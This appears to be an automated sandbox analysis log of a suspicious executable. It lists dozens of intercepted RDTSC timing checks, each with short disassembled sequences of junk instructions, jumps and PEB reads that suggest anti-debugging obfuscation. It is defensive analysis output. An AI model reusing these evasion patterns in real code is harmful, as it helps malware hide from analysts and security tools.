Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735003C second address: 735006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAACBBF1FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735006B second address: 73500B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAAD0E3C5Dh 0x0000000b jmp 00007FAAAD0E3C5Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 jmp 00007FAAAD0E3C66h 0x0000001b mov eax, dword ptr fs:[00000030h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73500B1 second address: 73500B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73500B7 second address: 73500FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007FAAAD0E3C60h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAD0E3C67h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73500FC second address: 7350150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAAACBBF207h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 jmp 00007FAAACBBF204h 0x00000018 mov edx, eax 0x0000001a popad 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAAACBBF203h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350150 second address: 7350177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350177 second address: 73501DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAACBBF201h 0x00000008 pop eax 0x00000009 jmp 00007FAAACBBF201h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007FAAACBBF201h 0x00000017 xchg eax, esi 0x00000018 jmp 00007FAAACBBF1FEh 0x0000001d mov esi, dword ptr [770206ECh] 0x00000023 jmp 00007FAAACBBF200h 0x00000028 test esi, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73501DF second address: 73501E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73501E3 second address: 7350200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350200 second address: 7350219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov ch, 21h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FAAAD0E4AB8h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350219 second address: 73502E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FCh 0x00000012 adc al, 00000078h 0x00000015 jmp 00007FAAACBBF1FBh 0x0000001a popfd 0x0000001b movzx eax, bx 0x0000001e popad 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FAAACBBF1FDh 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FAAACBBF1FCh 0x00000030 and cx, 2C08h 0x00000035 jmp 00007FAAACBBF1FBh 0x0000003a popfd 0x0000003b movzx esi, di 0x0000003e popad 0x0000003f call dword ptr [76FF0B60h] 0x00000045 mov eax, 7571E5E0h 0x0000004a ret 0x0000004b jmp 00007FAAACBBF1FBh 0x00000050 push 00000044h 0x00000052 jmp 00007FAAACBBF206h 0x00000057 pop edi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov al, bl 0x0000005d pushfd 0x0000005e jmp 00007FAAACBBF206h 0x00000063 add esi, 6AF14BF8h 0x00000069 jmp 00007FAAACBBF1FBh 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73502E0 second address: 73502E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73502E7 second address: 735032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bx, cx 0x0000000c mov cl, 59h 0x0000000e popad 0x0000000f mov dword ptr [esp], edi 0x00000012 jmp 00007FAAACBBF201h 0x00000017 push dword ptr [eax] 0x00000019 pushad 0x0000001a mov esi, 0027A6A3h 0x0000001f call 00007FAAACBBF208h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735032C second address: 7350359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000030h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAAD0E3C5Dh 0x00000013 jmp 00007FAAAD0E3C5Bh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ax, 5365h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350409 second address: 735042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAACBBF201h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop ecx 0x00000013 mov si, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735042C second address: 7350445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0CAD3EE9h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FAB1CD32EC5h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350445 second address: 7350449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350449 second address: 7350466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350466 second address: 73504A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAACBBF207h 0x00000008 jmp 00007FAAACBBF208h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73504A3 second address: 73504A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73504A9 second address: 7350508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAACBBF1FBh 0x00000009 or eax, 21A0583Eh 0x0000000f jmp 00007FAAACBBF209h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FAAACBBF200h 0x0000001b adc eax, 488FCD38h 0x00000021 jmp 00007FAAACBBF1FBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov dword ptr [esi], edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 mov ecx, edi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350508 second address: 735050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735050E second address: 73505B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FEh 0x00000012 adc ch, FFFFFFC8h 0x00000015 jmp 00007FAAACBBF1FBh 0x0000001a popfd 0x0000001b mov dl, cl 0x0000001d popad 0x0000001e mov dword ptr [esi+08h], eax 0x00000021 pushad 0x00000022 push ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 mov ebx, 5509850Eh 0x0000002b popad 0x0000002c mov dword ptr [esi+0Ch], eax 0x0000002f pushad 0x00000030 movsx edi, si 0x00000033 push ecx 0x00000034 pushad 0x00000035 popad 0x00000036 pop edi 0x00000037 popad 0x00000038 mov eax, dword ptr [ebx+4Ch] 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FAAACBBF202h 0x00000042 xor ecx, 42587B88h 0x00000048 jmp 00007FAAACBBF1FBh 0x0000004d popfd 0x0000004e call 00007FAAACBBF208h 0x00000053 push ecx 0x00000054 pop edx 0x00000055 pop esi 0x00000056 popad 0x00000057 mov dword ptr [esi+10h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FAAACBBF208h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73505B7 second address: 73505BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73505BE second address: 7350602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+50h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FAAACBBF204h 0x00000012 pushfd 0x00000013 jmp 00007FAAACBBF202h 0x00000018 sub ch, FFFFFFD8h 0x0000001b jmp 00007FAAACBBF1FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350602 second address: 7350655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C5Fh 0x00000009 add eax, 0343389Eh 0x0000000f jmp 00007FAAAD0E3C69h 0x00000014 popfd 0x00000015 mov ah, 84h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+14h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAAAD0E3C66h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350655 second address: 73506B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAACBBF204h 0x00000013 add ecx, 278E1C28h 0x00000019 jmp 00007FAAACBBF1FBh 0x0000001e popfd 0x0000001f call 00007FAAACBBF208h 0x00000024 mov esi, 06579021h 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [esi+18h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73506B7 second address: 73506CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73506CD second address: 73506D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73506D3 second address: 73506D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73506D7 second address: 735070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b jmp 00007FAAACBBF209h 0x00000010 mov dword ptr [esi+1Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAAACBBF1FDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735070D second address: 735071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735071D second address: 7350721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350721 second address: 735078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b jmp 00007FAAAD0E3C67h 0x00000010 mov dword ptr [esi+20h], eax 0x00000013 jmp 00007FAAAD0E3C66h 0x00000018 mov eax, dword ptr [ebx+60h] 0x0000001b jmp 00007FAAAD0E3C60h 0x00000020 mov dword ptr [esi+24h], eax 0x00000023 pushad 0x00000024 mov cl, A1h 0x00000026 mov dh, 48h 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+64h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAAAD0E3C5Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735078B second address: 735079A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735079A second address: 73507A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73507A0 second address: 73507A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73507A4 second address: 73507C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e pushad 0x0000000f mov dh, ah 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cx, di 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73507C0 second address: 735085E instructions: 0x00000000 rdtsc 0x00000002 mov edx, 3A6123BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+68h] 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 popad 0x00000011 mov dword ptr [esi+2Ch], eax 0x00000014 pushad 0x00000015 call 00007FAAACBBF206h 0x0000001a mov esi, 1C0ADA91h 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov ax, word ptr [ebx+6Ch] 0x00000025 pushad 0x00000026 mov cl, CAh 0x00000028 push edi 0x00000029 push ecx 0x0000002a pop edi 0x0000002b pop eax 0x0000002c popad 0x0000002d mov word ptr [esi+30h], ax 0x00000031 pushad 0x00000032 mov bl, 44h 0x00000034 mov si, BBD7h 0x00000038 popad 0x00000039 mov ax, word ptr [ebx+00000088h] 0x00000040 jmp 00007FAAACBBF1FAh 0x00000045 mov word ptr [esi+32h], ax 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FAAACBBF1FEh 0x00000050 sub ax, 2178h 0x00000055 jmp 00007FAAACBBF1FBh 0x0000005a popfd 0x0000005b mov si, 60AFh 0x0000005f popad 0x00000060 mov eax, dword ptr [ebx+0000008Ch] 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FAAACBBF201h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735085E second address: 7350892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAD0E3C68h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350892 second address: 7350898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350898 second address: 735089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735089E second address: 73508A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73508A2 second address: 73508A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73508A6 second address: 7350924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007FAAACBBF200h 0x00000012 pop esi 0x00000013 pushfd 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 jmp 00007FAAACBBF203h 0x0000001e popfd 0x0000001f popad 0x00000020 push ecx 0x00000021 call 00007FAAACBBF1FFh 0x00000026 pop ecx 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esi+38h], eax 0x0000002c pushad 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+1Ch] 0x00000034 jmp 00007FAAACBBF209h 0x00000039 mov dword ptr [esi+3Ch], eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f mov ah, 41h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350924 second address: 73509E3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAAD0E3C5Fh 0x00000008 or cx, A97Eh 0x0000000d jmp 00007FAAAD0E3C69h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, cx 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c pushad 0x0000001d mov bh, al 0x0000001f pushfd 0x00000020 jmp 00007FAAAD0E3C65h 0x00000025 adc eax, 1A038E66h 0x0000002b jmp 00007FAAAD0E3C61h 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esi+40h], eax 0x00000035 jmp 00007FAAAD0E3C5Eh 0x0000003a lea eax, dword ptr [ebx+00000080h] 0x00000040 jmp 00007FAAAD0E3C60h 0x00000045 push 00000001h 0x00000047 pushad 0x00000048 mov dx, ax 0x0000004b pushad 0x0000004c mov di, cx 0x0000004f popad 0x00000050 popad 0x00000051 push esp 0x00000052 pushad 0x00000053 call 00007FAAAD0E3C5Ch 0x00000058 mov ax, 57F1h 0x0000005c pop eax 0x0000005d mov ax, dx 0x00000060 popad 0x00000061 mov dword ptr [esp], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73509E3 second address: 73509E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73509E9 second address: 7350A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350A03 second address: 7350A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350A09 second address: 7350A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C60h 0x00000008 mov ax, DDB1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FAAAD0E3C5Ah 0x00000017 sbb esi, 16A9C788h 0x0000001d jmp 00007FAAAD0E3C5Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov cx, 8015h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350A48 second address: 7350A79 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAACBBF202h 0x00000008 sbb ecx, 45BFA9E8h 0x0000000e jmp 00007FAAACBBF1FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350A79 second address: 7350A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350A7D second address: 7350A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350A83 second address: 7350AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAAD0E3C63h 0x00000008 pop ecx 0x00000009 mov dh, CEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAAD0E3C5Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350AAE second address: 7350AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350AB2 second address: 7350AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350B5D second address: 7350B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350B61 second address: 7350B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350B67 second address: 7350C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FEh 0x00000012 xor ch, FFFFFFE8h 0x00000015 jmp 00007FAAACBBF1FBh 0x0000001a popfd 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e push ebx 0x0000001f jmp 00007FAAACBBF200h 0x00000024 mov dword ptr [esp], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FAAACBBF1FCh 0x0000002f sbb ecx, 3A9D5A78h 0x00000035 jmp 00007FAAACBBF1FBh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FAAACBBF208h 0x00000041 add si, 74D8h 0x00000046 jmp 00007FAAACBBF1FBh 0x0000004b popfd 0x0000004c popad 0x0000004d jmp 00007FAAACBBF208h 0x00000052 popad 0x00000053 lea eax, dword ptr [ebp-08h] 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350C25 second address: 7350C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350C29 second address: 7350C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
